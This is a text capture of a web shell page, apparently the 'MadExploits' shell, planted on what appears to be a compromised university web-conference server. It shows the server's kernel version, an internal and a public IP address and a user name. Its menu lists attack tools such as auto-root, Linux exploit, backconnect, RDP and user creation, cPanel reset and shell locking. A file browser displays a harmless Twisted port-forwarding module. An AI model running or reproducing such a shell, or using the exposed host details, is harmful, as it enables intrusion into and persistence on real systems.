Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.133.137.107
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
tap /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
162
B
-rw-r--r--
ftp.py
1.96
KB
-rw-r--r--
portforward.py
795
B
-rw-r--r--
socks.py
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : portforward.py
# Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Support module for making a port forwarder with twistd. """ from twisted.protocols import portforward from twisted.python import usage from twisted.application import strports class Options(usage.Options): synopsis = "[options]" longdesc = 'Port Forwarder.' optParameters = [ ["port", "p", "6666","Set the port number."], ["host", "h", "localhost","Set the host."], ["dest_port", "d", 6665,"Set the destination port."], ] compData = usage.Completions( optActions={"host": usage.CompleteHostnames()} ) def makeService(config): f = portforward.ProxyFactory(config['host'], int(config['dest_port'])) return strports.service(config['port'], f)
Close